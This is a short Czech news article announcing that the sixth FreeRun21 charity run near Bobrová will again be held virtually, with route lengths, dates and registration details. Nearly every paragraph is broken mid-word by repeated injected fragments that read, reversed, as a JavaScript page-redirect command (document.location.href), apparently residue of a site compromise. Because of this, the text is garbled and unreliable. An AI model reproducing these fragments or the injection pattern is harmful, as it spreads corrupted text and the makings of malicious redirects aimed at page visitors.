Rainbow page separator

Šestý ročník charitativního běhu se opět uskuteční virtuálně

Neděle, 15. srpna 2021

Bobrová / Pouze virtuálně se nakonec i v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce rozhodli organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři uspořádat šestý ročník charitativního běhu FreeRun21, který se měl první zářijovou sobotu uskutečnit v okolí Bobrové. Podsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou akce je zaběhat si, projet se na kole nebo se projít pěšky a vybrat při[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom co nejvíce peněz pro zdravotně znevýhodněné osoby.
Délku trasy si každý může zvolit podle své chuti a sil – v nabídce je 5, 10, 15 nebo 20 kilometrů – a absolvovat ji pak může kdekoliv v České republice v době od pátku 3. do neděle 5. září. Registrovat se je možné prostřednictvím www.ptime.cz.
Bližší informace jsou k dispozici přes facebook FreeRun Helps, facebookovou událost akce FreeRun21 i na webových stránkách www.freerunpomaha.cz. Loňský ročník běhu směřoval na pomoc tříletým autistickým dvojčatům Lei a Zoe. Cílem pořadatelů bylo zaplatit asistenčního psa, který bude holčičkám denně pomáhat, což se také podařilo.

 

ilustrační fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to